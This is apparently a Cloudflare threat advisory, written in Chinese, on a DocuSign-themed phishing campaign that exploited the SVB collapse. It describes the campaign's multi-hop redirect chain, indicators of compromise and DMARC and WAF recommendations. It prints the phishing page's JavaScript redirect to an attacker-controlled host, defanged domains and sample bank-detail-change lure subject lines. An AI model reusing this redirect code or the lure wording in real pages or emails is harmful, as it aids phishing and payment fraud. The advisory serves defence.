到目前為止,有關矽谷銀行 (SVB) 發生崩塌和被美國聯邦政府接管的新聞已經人盡皆知。崩塌發生速度之快讓很多人大跌眼鏡,並且對大大小小的組織的影響預計會持續一段時間。
很遺憾,大家看到的是慘況,而威脅執行者看到的卻是機會。我們一次又一次地目睹這種事情 —— 為了破壞信任和欺騙毫無戒心的受害者,威脅執行者會排山倒海地使用熱點時事作為誘餌。這些威脅活動緊跟新聞週期或備受矚目的公開活動(超級盃、瘋狂三月、繳稅日,黑色星期五促銷、新冠肺炎,等等)而來,因為無論在任何時候,如果郵件中提到了最熱門的事件,使用者都更有可能被吸引。
SVB 新聞週期促成了一個同樣引人注目的熱點時事,讓威脅執行者能夠加以利用;組織必須加強宣傳活動和技術控制,以幫助抵制最終在即將發生的攻擊中使用這些策略。可悲的是,FDIC 正在保證 SVB 客戶的資金是安全的,而不良執行者卻試圖竊取這筆錢!
先發制人的行動
由於預計未來網路釣魚攻擊會利用 SVB 品牌,Cloudforce One(Cloudflare 的威脅運作與研究團隊)自 2023 年 3 月 10 日起大幅增加了我們對 SVB 數位存在的品牌監控,並推出了其他多個偵測模組來發現 SVB 主題的網路釣魚活動。所有利用我們各種網路釣魚保護服務的客戶都會自動從這些新模型中獲益。
下面是一個真實的例子,描述了 SVB 自 FDIC 接管銀行以來發生的一起活動。
KYC 網路釣魚——以 DocuSign 為主題的 SVB 活動
威脅執行者經常使用的一項策略是模仿正在進行的 KYC(了解您的客戶)工作,銀行會定期執行這些工作以驗證有關客戶的詳細資料。這樣做是為了保護金融機構,幫助其避免欺詐、洗錢和金融犯罪等風險。
2023 年 3 月 14 日,Cloudflare 在 DocuSign 主題範本中偵測到一起利用 SVB 品牌的大型 KYC 網路釣魚活動。此活動針對 Cloudflare 和幾乎所有產業類別。在活動開始後的前幾個小時內,我們偵測到 79 起針對多個組織中不同個人的攻擊。Cloudflare 將發佈此活動的一個具體範例以及策略和值得注意的情況,我們認為這些內容有助於客戶瞭解此活動並保持警惕。
活動詳情
下面顯示的網路釣魚攻擊於 2023 年 3 月 14 日針對 Cloudflare 的創辦人兼 CEO Matthew Prince 發起。它包括的 HTML 程式碼中包含一個初始連結和一個複雜的四層重新導向鏈結。當使用者按一下「檢閱文件」連結時,鏈結就開始了。它會透過 Amazon Advertising Server bs[.]serving-sys[.]com 將使用者帶到由 Sizmek 執行的可追蹤的分析連結。然後,該連結會將使用者進一步重新導向到託管在網域 na2signing[.]web[.]app 上的 Google Firebase 應用程式。而 na2signing[.]web[.]app HTML 隨後會將使用者重新導向到一個 WordPress 網站,該網站正在 eaglelodgealaska[.]com 執行另一個重新導向程式。在這個最後的重新導向之後,使用者被傳送至攻擊者控制的 docusigning[.]kirklandellis[.]net 網站。
活動時間表
查看 HTML 檔案 Google Firebase 應用程式 (na2signing[.]web[.]app)
2023-03-14T12:05:28Z First Observed SVB DocuSign Campaign Launched
2023-03-14T15:25:26Z Last Observed SVB DocuSign Campaign Launched
攻擊中包含的 HTML 檔案會將使用者傳送到具有遞迴重新導向功能的 WordPress 實例。截至撰寫本文之時,我們不確定這一特定的 WordPress 安裝是否已遭到入侵或是否安裝了外掛程式以開啟此重新導向位置。
入侵指標
<html dir="ltr" class="" lang="en"><head>
<title>Sign in to your account</title>
<script type="text/javascript">
window.onload = function() {
function Redirect (url){
window.location.href = url;
}
var urlParams = new URLSearchParams(window.location.href);
var e = window.location.href;
Redirect("https://eaglelodgealaska[.]com/wp-header.php?url="+e);
}
</script>
建議
na2signing[.]web[.]app Malicious Google Cloudbase Application.
eaglelodgealaska[.]com Possibly compromised Wordpress website or an open redirect.
*[.]kirklandellis[.]net Attacker Controlled Application running on at least docusigning[.]kirklandellis[.]net.
Cloudflare Email Security 客戶可以使用下列搜尋字詞判斷他們是否已在儀表板上收到此活動:
SH_6a73a08e46058f0ff78784f63927446d875e7e045ef46a3cb7fc00eb8840f6f0
客戶也可以透過我們的威脅指標 API 追蹤與此活動相關的 IOC。任何更新的 IOC 都會持續推送至相關的 API 端點。
請確定在內送郵件中強制執行適當的 DMARC 原則。Cloudflare 建議,對於傳入郵件上的任何 DMARC 失敗,強制執行 [p = quarantine] 。SVB 的 DMARC 記錄 [
v=DMARC1; p=reject; pct=100
] 明確表示,拒絕任何模擬其品牌且未從 SVB 的指定和已驗證寄件者清單傳送的郵件。Cloudflare Email Security 客戶將根據 SVB 發佈的 DMARC 記錄自動獲得此強制執行。對於其他網域,或者若要對所有內送郵件套用更廣泛的基於 DMARC 的原則,Cloudflare 建議在 Cloudflare Area 1 儀表板內對所有內送電子郵件中遵循「增強型寄件者驗證」原則。Cloudflare Gateway 會自動保護客戶免受這些惡意 URL 和網域的攻擊。客戶可以在記錄中檢查這些特定的 IOC,以判斷其組織是否有流量流向這些網站。
與網路釣魚意識和訓練提供者合作,為終端使用者部署 SVB 主題的網路釣魚模擬(如果他們尚未這樣做)。
鼓勵終端使用者對任何 ACH(自動清算所)或 SWIFT(環球銀行金融電信協會)相關郵件保持警惕。ACH 和 SWIFT 是金融機構用於實體之間電匯的系統。鑒於它們的使用範圍非常之廣,威脅執行者經常利用 ACH 和 SWIFT 網路釣魚來將支付重新導向到自己。儘管過去幾天我們還沒有看到任何利用 SVB 品牌的大型 ACH 活動,但這並不意味著它們不在謀劃之中或者正在逼近。以下是我們在類似的付款欺詐活動中看到的幾個主題行範例:
「我們已變更銀行詳細資料」「銀行帳戶資訊已更新」「需要緊急行動 -重要 - 銀行帳戶詳細資料變更」「重要 - 銀行帳戶詳細資料變更」「金融機構變更通知」
保持警惕,防止類似網域在電子郵件和與 SVB 相關的 Web 流量中出現。Cloudflare 客戶在電子郵件和 Web 流量中內建了新網域控制項,可防止來自這些新網域的異常活動通過。
確保所有面向公眾的 Web 應用程式始終修補至最新版本,並在應用程式前面執行新式 Web 應用程式防火牆服務。上面提到的活動利用了 WordPress,威脅執行者經常在網路釣魚網站上使用它。如果您使用的是 Cloudflare WAF,甚至可以在尚未瞭解協力廠商 CVE 的時候就自動受到保護。擁有有效的 WAF 至關重要,它可防止威脅執行者接管您的公共 Web 存在並利用它發起網路釣魚活動(SVB 主題或其他方式)。
保持領先
Cloudforce One(Cloudflare 的威脅運作團隊)會在新興活動的形成階段主動監控它們,並發佈公告和偵測模型更新,以確保我們的客戶受到保護。儘管這個特定的活動以 SVB 為中心,但所使用的策略與其他類似的活動並沒有什麼不同,我們的全球網路每天都會看到這些活動,並在它們影響到我們的客戶之前自動予以阻止。
在多個通訊通道中融合強大的技術控制,再加上讓訓練有素和保持警惕的員工瞭解數位通訊帶來的危險,對於阻止這些攻擊通過起著至關重要的作用。
深入瞭解 Cloudflare 如何使用 Zero Trust 服務幫您完成全面的網路釣魚保護之旅,並立即連絡免費評估。